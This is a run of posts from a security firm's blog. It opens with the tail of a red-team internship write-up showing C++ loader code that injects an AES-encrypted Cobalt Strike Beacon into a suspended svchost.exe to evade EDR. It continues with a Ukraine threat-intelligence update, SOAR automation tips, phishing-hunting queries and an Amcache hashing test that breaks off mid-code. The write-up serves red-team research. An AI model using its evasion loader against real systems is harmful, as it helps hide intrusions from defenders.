    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);

    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, (LPSTR)"C:\\Windows\\System32\\svchost.exe", NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
        std::cout << "Could not spawn process" << std::endl;
        return INVALID_HANDLE_VALUE;
    }

    return pi.hProcess;
}

The Beacon payload is stored as an AES256 encrypted PE resource and decrypted in memory before being injected into the remote process.

DWORD rcSize = fpSizeofResource(NULL, rc);
HGLOBAL rcData = fpLoadResource(NULL, rc);

char* key = (char*)"16-byte-key-here";
const uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f };

int blenu = rcSize;
int klen = strlen(key);

int klenu = klen;
if (klen % 16)
    klenu += 16 - (klen % 16);

uint8_t* keyarr = new uint8_t[klenu];
ZeroMemory(keyarr, klenu);
memcpy(keyarr, key, klen);

uint8_t* bufarr = new uint8_t[blenu];
ZeroMemory(bufarr, blenu);
memcpy(bufarr, rcData, blenu);

pkcs7_padding_pad_buffer(keyarr, klen, klenu, 16);

AES_ctx ctx;
AES_init_ctx_iv(&ctx, keyarr, iv);
AES_CBC_decrypt_buffer(&ctx, bufarr, blenu);

Last but not least, I incorporated the Sleep_Mask directive in my Cobalt Strike Malleable C2 profile. This tells Cobalt Strike to obfuscate Beacon in memory before it goes to sleep by means of an XOR encryption routine.
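Conceptually, such a sleep mask is a symmetric XOR pass over Beacon's memory sections: the same pass that masks the data on sleep restores it on wake. The sketch below illustrates only the idea and is not Cobalt Strike's actual routine:

```cpp
#include <cstdint>
#include <cstddef>

// Illustrative XOR mask over a memory region with a repeating key.
// Because XOR is its own inverse, calling this twice with the same key
// restores the original bytes.
void XorMask(uint8_t* buf, size_t len, const uint8_t* key, size_t keylen) {
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key[i % keylen];
}
```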

The loader was able to execute Beacon undetected and, with the help of my kernel driver, running Mimikatz was but a click of a button.

On that bombshell, it’s time to end this internship and I think I can conclude that while having a kernel driver to tamper with EDR/AV is certainly useful, a majority of the detection mechanisms are still present in user land or are driven by signatures and rules for static detection.

6. Conclusion

During this Kernel Karnage series, I developed a kernel driver from scratch, accompanied by several different loaders, with the goal to effectively tamper with EDR/AV solutions to allow execution of common known tools which would otherwise be detected immediately. While there certainly are several factors limiting the deployment and application of a kernel driver (such as DSE, HVCI, Secure Boot), it turns out to be quite powerful in combination with user land evasion techniques and manages to address the AI/ML component of EDR/AV which would otherwise require a great deal of obfuscation and anti-sandboxing.

About the author

Sander is a junior consultant and part of NVISO’s red team. He has a passion for malware development and enjoys any low-level programming or stumbling through a debugger. When Sander is not lost in 1s and 0s, you can find him traveling around Europe and Asia. You can reach Sander on LinkedIn or Twitter.

Threat Update – Ukraine & Russia war

24 February 2022 at 17:03

Last updated on 2022-03-17/ 8am CET

2022-02-25: added key historical operation: Cyclops Blink
2022-03-02: added note on spillover and recommendation
2022-03-03: added further information on attacks, updated recommendations
2022-03-07: added info on HermeticRansom decrypter and our mission statement
2022-03-15: added info on CaddyWiper and fake AV update phishing campaign used to drop Cobalt Strike
2022-03-17: added info on the removal of a deepfake video of Ukrainian President Zelenskyy

Introduction & background

In this report, NVISO CTI describes the cyber threat landscape of Ukraine and by extension the current situation. Understanding the threat landscape of a country, however, requires an understanding of its geography first and foremost.

Figure 1 – Map of Ukraine and bordering countries

Ukraine, bordered by Russia as well as Belarus, has seen its share of hostile intelligence operations and near declarations of war. Crimea, a peninsula that was officially recognized as part of Ukraine, was annexed by Russia in early 2014: this was one of the first and larger “turning points” in modern history.

More recently, in 2018, Russia took it one step further after several years of absorbing Crimea as part of Russia, by installing a border fence to separate Crimea from Ukraine.[1]

In 2020, during several Belarusian protests targeted at Belarus’ current president Lukashenko, Ukraine recalled its ambassador to assess the prospects, or lack thereof, regarding their bilateral relationship.[2] Tensions increased further, and in 2021, Ukraine joined the European Union (EU) in imposing sanctions on Belarusian officials.[3]

In 2022, this tension materialized by Russia actively performing military operations on Ukraine’s border, and in February, the bombardment of several strategic sites in Ukraine.[4]

Historical Cyber Attacks

As mentioned, to understand a country, one needs to understand its geography and geopolitical strategy. A remarkable initiative from Ukraine is its intent to join NATO as well as to become an official member of the EU. These initiatives are likely the trigger for the recent turmoil: in December 2021, Russia became openly bolder and more aggressive, with the ultimate goal, as explained by Putin, of unifying or absorbing Ukraine back into Russia. In that same month, Putin presented the United States and NATO with a list of security demands, including that Ukraine never join NATO.[5] As always, Putin’s intent likely has multiple dimensions.

This report will describe further history of cyber-attacks on Ukraine, a timeline of current relevant events in cyberspace, and finally some recommendations to ensure protection in case of “cyberwar spillover”, as was the case with NotPetya in 2017.

As mentioned in the introduction, Ukraine has seen its fair share of targeted cyber-attacks. The table below captures significant Advanced Persistent Threat (APT) campaigns / attacks against Ukraine specifically.

Attack Group | Attack Purpose | Malware / Toolset | Date
Black Energy (aka Sandworm) | Disrupt / Destroy | KillDisk / Black Energy | 2015
Black Energy | Disrupt / Destroy | Industroyer | 2016
Black Energy | Disrupt / Destroy | NotPetya | 2017
Grey Energy (Black Energy successor) | Espionage | GreyEnergy | 2018
Black Energy | Espionage | VPNFilter | 2018
Unknown, likely DEV-0586 (aka GhostWriter) | Disrupt / Destroy | WhisperGate | 2022
Unknown, likely DEV-0586 | Disrupt / Destroy | HermeticWiper | 2022
Black Energy | Disrupt / Destroy | Cyclops Blink | 2022*
Table 1 – Key historic attacks

Other attacks have taken place, both cyber-espionage and cyber-criminal, but the threat group “Black Energy” is by far the most prolific in targeting Ukrainian businesses and governmental institutions.

Black Energy and its successors and sub-units are attributed to Russia’s Intelligence Directorate or GRU (now known as the “Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation”). The GRU is Russia’s largest foreign intelligence agency and has therefore access to a vast number of resources, capabilities, and certain freedom to execute more risky intelligence operations. Note that APT28, also known as Sofacy and “Fancy Bear” is also part of the GRU but resides in a different unit.[6]

Specifically looking at the attacks targeting Ukraine in 2022, a timeline can be observed below:

Figure 2 – Ukraine 2022 timeline

Highlighted in blue on the timeline, are suspected attack campaigns by nation states, likely either Russia or Belarus. Highlighted in green are suspected attack campaigns by cybercriminal actors in favor of Russia.

Highlighted in red on the timeline is an intelligence counteraction by Ukraine’s Security Service, known as the SSU or SBU. The SSU can be seen as Ukraine’s main government agency protecting national interests, but it also has a focus on counterintelligence operations. On February 8th 2022, the SSU shut down a Russian “troll farm” whose sole intent was to distribute fake news and spread panic. The bots also published false information about bomb threats at various facilities.[7]

NVISO CTI assesses with moderate confidence that Russia and Belarus will continue destructive or espionage operations against Ukraine’s infrastructure and those who support Ukraine, whether logistically, operationally, or otherwise publicly.

As of yet, spillover of these operations has not been observed in Belgium by organizations such as the Centre for Cyber security Belgium (CCB).[8] The UK’s National Cyber Security Centre (NCSC) in turn advises “organizations to act following Russia’s attack on Ukraine” and provides further guidance.[9]

Key historical operations

In a quick overview of the aforementioned pre-2022 attacks, the following are some of the key elements that contributed to their success, and which are important to take into account when building a detection strategy:

  • The attack on the Ukrainian power grid was prefaced with a phishing attack against a number of energy distribution companies. The phishing email contained a Word document that, when Macros were enabled, dropped the Black Energy malware to disk. Using this malware the adversaries obtained credentials to access VPN and remote support systems that allowed them to open circuit breakers remotely. In order to prevent the operators from closing the circuit breakers remotely again, a wiper was deployed on the operator machines.
  • NotPetya was initially deployed via a supply chain attack on Linkos Group. The NotPetya ransomware caused worldwide damages due to its highly effective spreading mechanism combining the EternalBlue (MS17-010) vulnerability, credential dumping from infected systems and PsExec for lateral movement.
  • GreyEnergy and its accompanying toolset was typically prefaced with a phishing attack, containing malicious documents that would deploy “GreyEnergy mini”, a first-stage backdoor. A second point of entry was via vulnerable public-facing web services that are connected to the organization’s internal network. The attacker’s toolset also contained Nmap and Mimikatz for discovery and lateral movement.
  • VPNFilter is a multi-stage, modular platform with versatile capabilities to perform a wide range of operations, primarily espionage but also destructive attacks. The malware installs itself on network devices such as routers and NAS, and can only be completely removed with a full reinstallation. Its current preface or infection vector is unknown, but it is assumed they target vulnerabilities in these network devices as an initial entrypoint. VPNFilter was a broad-targeting malware and campaign, but was responsible for multiple large-scale attacks that targeted devices in Ukraine.
  • Cyclops Blink is the “replacement framework” of VPNFilter and has been active since at least June 2019, fourteen months after VPNFilter was disrupted. Just like VPNFilter, Cyclops Blink is broad-targeting, but might be targeting devices in Ukraine specifically. As opposed to VPNFilter, Cyclops Blink is only known to target WatchGuard network devices at this point in time. Its preface is WatchGuard devices that expose the remote management interface to the internet / external access.

Current Cyber Attacks (2022)

WhisperGate
Starting on January 13th, 2022, several Ukrainian organizations were hit with a destructive malware now known as WhisperGate. The malware was designed to wipe the Master Boot Record (MBR) and proceed to corrupt the files on disk, destroying all traces of the data.

Initial execution of the first stage was performed using Impacket, a Python toolset widely used for lateral movement and execution. Initial access to run Impacket is believed to have occurred via insecure remote access channels and stolen or harvested credentials.

Once the MBR is wiped, a fake ransom screen is displayed. This is merely a distraction while the third stage is downloaded from a Discord link, after which all data on disk is overwritten.

Massive web defacements

Between the 13th and 14th of January, a coordinated web defacement on several governmental institutions of Ukraine took place – all websites and their content were wiped and replaced with a statement[10]:

Ukrainian! All your personal data has been sent to a public network. All data on your computer is destroyed and cannot be recovered. All information about you stab (public, fairy tale and wait for the worst. It is for you for your past, the future and the future. For Volhynia, OUN UPA, Galicia, Poland and historical areas.[10]

The SSU assesses the attack happened via a vulnerable Content Management System (CMS), and that “in total more than 70 state websites were attacked, 10 of which were subjected to unauthorized interference”.[11]

DDOS attacks on organizations

On February 15th, Ukraine’s Ministry of Defence (MoD) tweeted[11] that “The MOU website probably suffered a DDoS attack: an excessive number of requests per second was recorded.

Technical works on restoration of regular functioning are carried out.”

The attack was carried out against the MoD itself and the Armed Forces of Ukraine, but also against two national banks, with the result that internet banking was unavailable for several hours.

DDoS attacks & the “HermeticBunch”

On February 23rd, there were two newly reported cyber events: DDoS attacks and an attack campaign we could name “HermeticBunch”.

NetBlocks, an internet observatory, noted the DDoS attacks on February 23rd around 4pm CET. The attacks impacted the websites of Ukraine’s MoD, Ministry of Foreign Affairs (MoFA) and other governmental institutions.[12]

ESET initially reported[13] detecting a new wiper malware used in Ukraine. Their telemetry indicated the malware was installed on several hundreds of machines with first instances discovered around 4pm CET. Symantec posted an analysis[14] the next day corroborating ESET’s findings, and providing more insight into the attack: ransomware was initially deployed, as a smokescreen, to hide the data-wiping malware that was effectively used to launch attacks against Ukrainian organizations.

ESET reported on March 1st [15] that multiple Ukrainian organizations were targeted by an attack campaign comprising:

  • HermeticWiper, a data-wiping malware;
  • HermeticWizard, spreads HermeticWiper over the network (using WMI & SMB);
  • HermeticRansom: likely a ransomware smokescreen for HermeticWiper.

These components indicate an organized attack campaign whose main purpose is the destruction of data. While the spreader malware, HermeticWizard, is worrisome, it can be blocked by implementing the advice from the Recommendations section below.

Note that AVAST Threat Labs has created a decrypter for files encrypted with HermeticRansom. [17]


IsaacWiper was first detected by ESET on February 24th [18], and was again leveraged for destructive attacks against the Ukrainian government. The wiper is less sophisticated than HermeticWiper, but no less effective.


DanaBot is a Malware-as-a-Service (MaaS) platform where threat actors (“affiliates”) can purchase access to the underlying DanaBot platform. Zscaler reported on March 2nd [19] to have identified a threat actor targeting Ukraine’s Ministry of Defense (MoD) using DanaBot’s download and execute module.

Fake AV Update leading to Cobalt Strike

Phishing emails impersonating the Ukrainian government were seen on the 12th of March during a campaign to deliver Cobalt Strike beacons and Go backdoors. Reported by the Ukraine CERT (CERT-UA) [20], the emails were themed as “critical security updates” and contained links to download a fake AV update package. The 60 MB file was actually a downloader which then connected to a Discord CDN to download a file called one.exe, a Cobalt Strike beacon. It also downloads a Go dropper that executes and pulls down two more Go payloads, GraphSteel and GrimPlant, both of which are backdoors.


CaddyWiper was discovered by ESET on March 14th [21] and is the fourth data-wiping malware to be used against Ukraine. It was deployed via GPO, showing that the threat actor already had a major foothold in the environment. It also contains logic that prevents it from wiping Domain Controllers, as these are the foothold the attackers would lose if destroyed.

Deepfake video

On 16 Mar 2022, Facebook removed a deepfake video of Ukrainian President Zelenskyy asking Ukrainian troops to surrender. The video initially appeared on the compromised website of news channel, Ukraine 24, before it was spread to other compromised websites, such as Segodnya. In response, Zelenskyy published a video of his own, asking Russian troops to surrender instead. [22]


Based on the collective knowledge on adversary groups acting in the interests of the Russian state and the current ongoing events, it is important for organizations to use this momentum to implement a number of critical defenses and harden their overall environment.

Each organization should review their own threat model with regards to the potential threats facing them, however, the below is a good overview to improve your security posture against a variety of (destructive) attacks.

Your external exposure

It is advised to perform a periodic assessment of your external perimeter to identify what systems and services are exposed to the internet. Given the cloud-first approach many organizations are taking, it has become less straightforward to identify which services your organization exposes to the internet; however, attack surface monitoring solutions can provide an answer by looking beyond the scope of your organization’s IP range.

For all identified services exposed to the internet, ensure:

  • They are actually required to be exposed to the internet;
  • They are up to date with the latest security patches.

For all services for which authentication is required (e.g. VPN solutions, access to your client portal, etc.) it is strongly advised to enforce Multi Factor Authentication (MFA).

Abuse of (privileged) accounts

Once inside your network, threat actors are very frequently seen going after privileged accounts (be it local admin accounts or privileged domain accounts).

In terms of local admin accounts, it is important to ensure these accounts have strong passwords assigned to them, and that no password re-use is performed across different hosts. Each local administrator account as such should have a unique strong password assigned to it. Various tools exist that can support in the automated configuration of these unique passwords for each of these accounts. A good example that can be used is Microsoft’s Local Administrator Password Solution (LAPS).

For privileged domain accounts (e.g. a specific server administrator, the domain administrator or the accounts that have access to your security tooling such as EDRs), it is strongly advised to implement MFA.

Lateral Movement

Once the adversary has obtained access into the environment, they’ll move laterally to eventually gain access to the critical assets of the organization. The following are a number of key recommendations to help in the prevention of successful lateral movement:

  • Implement network segmentation and restrict the communication flows between segments only to the ones required for business reasons;
  • Configure host-based firewalls to restrict inbound connections (depending on your business, a few questions to ask could be: should I allow inbound SMB on my workstations, should an inbound RDP connection be possible from another workstation, etc.)
  • Harden RDP configuration by:
    • Denying server or Domain Administrator accounts from authenticating to workstations;
    • Enforcing Multi-Factor Authentication (MFA);
    • Where possible, use Remote Credential Guard or Restricted Admin.

In addition to the implementation of key hardening principles, the lateral movement phase of an attack is also an opportunity in which adversaries can be detected. Monitoring should be performed on workstation-to-workstation traffic and authentications, usage of RDP and WMI, as well as commonly used lateral movement tools such as PsExec, WinRM and PS Remoting.

Mandiant has additionally provided guidance on protecting against destructive attacks [20](PDF).

Critical Assets

In several cases, the adversaries have been observed conducting destructive attacks. As a proactive measure, ensure offline backups of your critical assets (such as your Domain Controllers) are created regularly. A frequently overlooked aspect of a backup strategy is restore testing: on a frequent basis, it should be verified that backups can effectively be restored to a known good state.

On a final note, given that the majority of systems are virtualized these days, it’s important to ensure the access to your back-end virtualization environment is properly segmented and secured.

Phishing Prevention

A number of the observed attacks that Russia-linked threat actors have executed were initiated via a phishing campaign with the goal of stealing user credentials or executing malware on the systems. As such, it is important to verify the hardening settings of your mail infrastructure. Some key elements to take into account are:

  • Enable MFA on all mailboxes;
  • Disable legacy protocols that do not understand MFA and as such would allow an adversary to bypass this security control;
  • Perform sandbox execution of all attachments received via mail;
  • Enable safe links (various mail security providers offer this option) to have the URL checked for phishing markers once the user clicks.

Additionally, it is frequently observed that adversaries attempt to have a user enable Macros in the malicious Office documents they send. It is advised to review whether all users within your environment use Office Macros and whether or not these can be disabled. If Macros are used for business reasons, consider only allowing signed Macros.

DDOS Mitigations

Depending on your organization’s risk profile, there is the potential threat of a DDoS attack, especially following sanctions imposed on Russia in specific sectors. It is advised to investigate and implement DDoS mitigations on critical public-facing assets. Noteworthy is Google’s Project Shield [19], which is “a free service that defends news, human rights and election monitoring sites from DDoS attacks”. Google has recently expanded protection for Ukraine, and is already protecting more than 150 websites hosted in Ukraine.

Crisis & Incident Management

Tabletop exercises are a great way of measuring the crisis & incident management processes & procedures you currently have, and to identify any potential gaps that may be uncovered during a tabletop. Moreover, tabletops are cross-functional and can be used for both leadership, as well as anyone working with incidents on a day to day basis. The results of a tabletop exercise can ultimately be used as a platform to improve the current way of working, or to invest in new resources should there be a need.

About the authors

Bart Parys Bart is a manager at NVISO where he mainly focuses on Threat Intelligence and Malware Analysis. As an experienced consumer, curator and creator of Threat Intelligence, Bart has written many TI reports at both the strategic and operational level, across a wide variety of sectors and geographies.
Robert Nixon Robert is a manager at NVISO where he specializes in Cyber Threat Intelligence at the tactical, organizational and strategic level. He also is an SME in automation, CTI infrastructure, malware analysis, DFIR, and SIEM integrations/use case development.
Michel Coene Michel is a senior manager at NVISO where he is responsible for our CSIRT & TI services with a key focus on (and very much still enjoys hands on) incident response, digital forensics, malware analysis and threat intelligence.

Our goal is to provide fast, concise and actionable intelligence on critical cyber security incidents. Your comments and feedback are very important to us. Please do not hesitate to reach out to [email protected].


Cortex XSOAR Tips & Tricks

By: wstinkens
2 March 2022 at 08:55


With our Managed Detect and Respond (MDR) service, NVISO provides a managed Security Operations Center (SOC) for a large variety of clients across different industries. Since the beginning of this service, we had an “automate first” principle where we tried to automate as much of the repetitive tasks of the SOC analysts as possible, to allow them to focus on actionable security alerts to faster detect attackers in the environment of our customers.

To achieve this goal, NVISO has implemented Palo Alto Cortex XSOAR as its SOAR platform of choice and branded it as the NITRO platform. Cortex XSOAR is the market leader in security automation platforms and the most capable platform currently available. In addition to the automated workflows created for its managed SOC, NVISO has developed a range of NITRO services on top of Cortex XSOAR such as adversary emulation, vulnerability management and SIEM use case management.

While developing these solutions on Cortex XSOAR, our R&D and SOAR engineering teams have gained a lot of expertise on the platform, which we want to share with you in this blog post series. In each post, we will discuss a technical topic in detail, together with code snippets, example playbooks or automations you can use in your own Cortex XSOAR environment.

All content will be available in our NVISO Github:

All future posts will be added to the following series:

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Cortex XSOAR Tips & Tricks – Execute Command Function

By: wstinkens
2 March 2022 at 08:56


When developing the automated SOC workflows for the NVISO Managed SOC and the additional NITRO services on Cortex XSOAR, we have started to make use of automations to do complex tasks instead of playbooks. Automations have much better performance and, if your team has a decent level of Python skills, developing complex tasks in automations can be much easier than in playbooks.

When using automations in Cortex XSOAR, the command you will call most often is demisto.executeCommand. This is used to execute available commands from integrations and to call other automations.

To add additional functionality to this command, we have created our own nitro_execute_command wrapper function which is available on the NVISO Github:


When using demisto.executeCommand to run commands in an automation, the first issue you will come across is that it does not return an error when the command execution was unsuccessful. The execution status of the command that has run can be found in the Type key of the returned result of demisto.executeCommand:

{
    'ModuleName': 'CustomScripts',
    'Brand': 'Scripts',
    'Category': 'automation',
    'ID': '',
    'Version': 0,
    'Type': 1,
    'Contents': None
}

In our nitro_execute_command function, we loop through all returned results from demisto.executeCommand and check the Type key value. If the value is Error (4), we raise an exception with the error message:

raise Exception(f"Error when executing command: {command} with arguments:{args}: {error_result.get('Contents')}")

Because in certain use cases you might not want your automation to halt whenever a command fails, we have added a fail_on_error boolean parameter to nitro_execute_command:

nitro_execute_command(command='setIncident', args={'name': 'incident name'}, fail_on_error=False)

To improve the resiliency of our set of automations, we have additionally added retry logic when the execution of a command returns an error. In case of an error, the nitro_execute_command function retries by default 3 times before raising an exception and halting the automation. This can be configured with the retry parameter of nitro_execute_command:

nitro_execute_command(command='setIncident', args={'name': 'incident name'}, retry=5)

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_command in all your custom automations.
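To illustrate the behaviour described above, here is a minimal sketch of such a wrapper. The retry loop and error handling follow the description in this post; the actual NVISO implementation (available on their Github) may differ, and the _DemistoStub class is a hypothetical stand-in for Cortex XSOAR's demisto object so the sketch runs outside the platform:

```python
# Illustrative sketch of a nitro_execute_command-style wrapper.
# _DemistoStub is an assumption for demonstration only: inside XSOAR,
# the demisto object is provided by the platform.

ENTRY_TYPE_ERROR = 4  # XSOAR entry Type value that indicates an error


class _DemistoStub:
    """Minimal stand-in for the XSOAR demisto API (demo assumption)."""

    def executeCommand(self, command, args):
        if command == "failingCommand":
            return [{"Type": ENTRY_TYPE_ERROR, "Contents": "command failed"}]
        return [{"Type": 1, "Contents": {"command": command, "args": args}}]


demisto = _DemistoStub()


def nitro_execute_command(command, args=None, fail_on_error=True, retry=3):
    """Execute a command, retrying on error entries, and raise if the
    command still fails after all retries (unless fail_on_error=False)."""
    args = args or {}
    results, last_error = [], None
    for _ in range(max(1, retry)):
        results = demisto.executeCommand(command, args)
        errors = [r for r in results if r.get("Type") == ENTRY_TYPE_ERROR]
        if not errors:
            return results
        last_error = errors[0]
    if fail_on_error:
        raise Exception(
            f"Error when executing command: {command} with arguments: "
            f"{args}: {last_error.get('Contents')}"
        )
    return results
```

In a real automation you would drop the stub and rely on the platform-provided demisto object.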


About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Drilling down on phishing campaigns with UrlClickEvents

4 March 2022 at 11:05


On March 2nd 2022, I observed a new Advanced Hunting table in Microsoft 365 Defender: UrlClickEvents

Figure 1 – UrlClickEvents table

At the time of writing, this table is not yet present in every Office 365 tenant, and the official documentation does not contain information about it. A quick peek at the events it contains shows that it logs URLs on which users clicked from Office applications, such as Outlook and Teams. It also logs whether the click was allowed or blocked by Safe Links, and whether the user clicked through the potential warning page (if this setting is configured in Safe Links).

Here is the table format:

  • Timestamp: the timestamp at which the user clicked on the link;
  • Url: the URL that was clicked on by the user;
  • ActionType: indicates whether the click was allowed by Safe Links or not (values observed: ClickAllowed, ClickBlocked, UrlErrorPage, ClickBlockedByTenantPolicy);
  • AccountUpn: the User Principal Name of the account that clicked on the link;
  • Workload: the application from which the user clicked on the link (values observed: Email, Office, Teams);
  • NetworkMessageId: the unique identifier for the email that contains the clicked link, generated by Microsoft 365;
  • IPAddress: public IP address from which the user clicked on the link;
  • IsClickedThrough: indicates whether the user clicked through the potential Safe Links warning page (if this setting is configured in Safe Links);
  • UrlChain: appears to contain the list of redirect URLs, from our test data;
  • ReportId: value that “enables lookups for the original records”, according to the official documentation.

While URL clicks were already available in 365 Defender’s Threat Explorer dashboard for investigation (formerly in Office 365 ATP Threat Explorer), the availability of this data in Advanced Hunting opens new opportunities for hunting queries, custom detection rules and investigation.

Hunting Queries

Click on link that contains an unusual port

UrlClickEvents
| where ActionType == "ClickAllowed"
| extend Redirects = (array_length(todynamic(UrlChain))) - 1
| extend ParsedUrl = parse_url(tostring(Url))
| where ParsedUrl.Port !in ("", "443")
| where ParsedUrl.Host !endswith "<yourdomain>"
| project Timestamp, AccountUpn, Workload, NetworkMessageId, Url, Redirects, UrlChain

In this query, the following is performed:

  • Filter on clicks that were allowed by SafeLinks;
  • Store the number of redirect URLs in an array (later displayed in the results);
  • Parse the URL to extract the host, port, path, etc.;
  • Exclude URLs whose TCP port is empty, or equal to 443;
  • Exclude URLs whose host ends with the domain name of your organisation (this is to limit false-positive results);
  • Display the results.

Click on link where the host is a public IP address

UrlClickEvents
| where ActionType == "ClickAllowed"
| extend Redirects = (array_length(todynamic(UrlChain))) - 1
| extend ParsedUrl = parse_url(tostring(Url))
| where ipv4_is_private(tostring(ParsedUrl.Host)) == False
| project Timestamp, AccountUpn, Workload, NetworkMessageId, Url, Redirects, UrlChain

In this query, the following is performed:

  • Filter on clicks that were allowed by SafeLinks;
  • Store the number of redirect URLs in an array (later displayed in the results);
  • Parse the URL to extract the host, port, path, etc.;
  • Filter on URLs where the host is not a private IP address;
  • Display the results.

Custom Detection Rule

Click on link containing your domain name in base64-encoded format

UrlClickEvents
| where ActionType == "ClickAllowed"
| extend Redirects = (array_length(todynamic(UrlChain))) - 1
| where Redirects > 0
| where Url contains "<your_base64_encoded_domain>"
| project Timestamp, AccountUpn, Workload, NetworkMessageId, Url, Redirects, UrlChain

In this query, the following is performed:

  • Filter on clicks that were allowed by SafeLinks;
  • Store the number of redirect URLs in an array (later displayed in the results);
  • Filter on URLs which redirected the user at least once to another URL (as is often the case in phishing campaigns);
  • Filter on URLs which contain your organization’s domain name in base64-encoded format (as phishing URLs often contain the recipient’s email address in base64-encoded format);
  • Display the results.
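As an aside (an illustration, not part of the original rule): because base64 output depends on the byte offset at which a string starts, a domain has three possible encodings inside a larger base64 blob. A minimal Python sketch to generate all three search terms follows; the trimming logic is a commonly used technique, and "@example.com" is a placeholder:

```python
import base64
import math


def base64_search_terms(s: str) -> list[str]:
    """Return the three base64 fragments that match `s` at any byte
    alignment: encode with 0, 1 and 2 leading filler bytes, then trim
    the characters that mix in unknown neighbouring bytes."""
    data = s.encode()
    terms = []
    for pad in range(3):
        encoded = base64.b64encode(b"\x00" * pad + data).decode().rstrip("=")
        start = math.ceil(8 * pad / 6)       # chars tainted by the filler
        end = (8 * (pad + len(data))) // 6   # last char fully inside `s`
        terms.append(encoded[start:end])
    return terms


# base64_search_terms("@example.com") yields three strings, one of which
# appears in the base64 encoding of any email address at that domain.
```

Any of the three resulting fragments can then be used in the `contains` clause of the detection rule.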

Investigation Query (emails)

UrlClickEvents
| <your conditions>
| project Click_Time = Timestamp, NetworkMessageId, Clicked_Url = Url
| join EmailEvents on NetworkMessageId
| project Delivery_Time = Timestamp, Click_Time, Clicked_Url, RecipientEmailAddress, SenderMailFromAddress, SenderFromAddress, SenderDisplayName, Subject, AttachmentCount, UrlCount

In this query, the following is performed:

  • Filter the UrlClickEvents logs using your conditions, depending on the investigation;
  • Rename columns for better comprehension in the final results, and project the necessary value (NetworkMessageId) used for the future Join operation;
  • Join the EmailEvents table to display additional information for each URL click (e.g. email delivery time, sender details, subject, etc.);
  • Display the results.


This new UrlClickEvents table is an additional tool SOC and threat hunting teams can use to detect phishing campaigns missed by built-in technologies, through hunting and custom detection rules. Additionally, this will help incident responders flag users who accessed phishing links faster than by using Microsoft 365 Defender’s GUI, especially for extensive phishing campaigns.

About the author

Thibaut Flochon
Thibaut is an intrusion analyst within NVISO’s CSIRT & SOC team. He enjoys investigating security incidents, writing detection rules, and talking about preventive security controls.

Amcache contains SHA-1 Hash – It Depends!

7 March 2022 at 09:00

If you read about the Amcache registry hive and what information it contains, you will find a lot of references that it contains the SHA-1 hash of the file in the corresponding registry entry. Now that especially comes in handy if files are deleted from disk. You can use the SHA-1 extracted from the Amcache to search indicator of compromise lists or simply on the internet in general.

I recently came across a discussion where someone was asking for an explanation of SHA-1 hashes recorded in Amcache not matching the SHA-1 hash of the actual files. Another person claimed that this can happen, as the SHA-1 hash in Amcache is only calculated over the first 31,457,280 bytes of large files. Well, time to put this to the test.

The Amcache registry hive is typically used in investigations to gain knowledge on executed files. It can be found at the following path: C:\Windows\AppCompat\Programs\Amcache.hve

The executables of 7-Zip and RegistryExplorer were chosen to be candidates for testing. Let’s start by calculating their SHA-1 hashes on disk:

Figure 1: Calculating SHA-1 hashes for files on disk

As you can see, the files have the following SHA-1 hash values:

File name SHA-1 hash
7z.exe 1189CEBEB8FFED7316F98B895FF949A726F4026F
RegistryExplorer.exe E50B8FA6F73F76490818B19614EE8AEFD0AA7A49
Table 1: SHA-1 hashes on disk

If we now execute both files and afterwards acquire the Amcache hive, we can have a look at the recorded values. In this test KAPE was used to acquire the Amcache and Registry Explorer to open it.

Figure 2: Amcache.hve: Root\InventoryApplicationFile\7z.exe|afe683e0fa522625

By reviewing the FileId value and removing the prefix ‘0000’, we can see that this actually is the SHA-1 hash value of the file on disk. But the size of the 7z.exe file is below 31,457,280 bytes.

Figure 3: Amcache.hve: Root\InventoryApplicationFile\registryexplorer|54c8640d4bd6cc38

Doing the same exercise for RegistryExplorer.exe yields a recorded SHA-1 hash value of 0f487a4beec16dba123cbc860638223abb51d432. That value clearly does not match the SHA-1 hash we calculated earlier. The RegistryExplorer.exe file is larger than 31,457,280 bytes.

So if it is true that the SHA-1 stored in Amcache is calculated over at most the first 31,457,280 bytes of a file, we should be able to reproduce the recorded value.

Figure 4: Getting SHA-1 hash of first 31,457,280 bytes

Above you can see how the dd command was used to get a file containing only the bytes that should be considered for the hash calculation of the Amcache entry. The hashes for both the original file and the stripped file are shown as well.
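For reference, the same prefix hash can also be computed directly in Python without dd; a minimal sketch (the byte limit encodes the behaviour observed in this test, not an officially documented constant):

```python
import hashlib

# Amcache appears to hash at most the first 31,457,280 bytes of a file
# (observed behaviour from this test, not an officially documented limit).
AMCACHE_HASH_LIMIT = 31_457_280


def amcache_sha1(path: str, limit: int = AMCACHE_HASH_LIMIT) -> str:
    """Compute the SHA-1 value Amcache would record for `path`:
    the full-file hash for files below the limit, otherwise the
    hash of only the first `limit` bytes."""
    sha1 = hashlib.sha1()
    remaining = limit
    with open(path, "rb") as f:
        while remaining > 0:
            chunk = f.read(min(1024 * 1024, remaining))
            if not chunk:  # end of file reached before the limit
                break
            sha1.update(chunk)
            remaining -= len(chunk)
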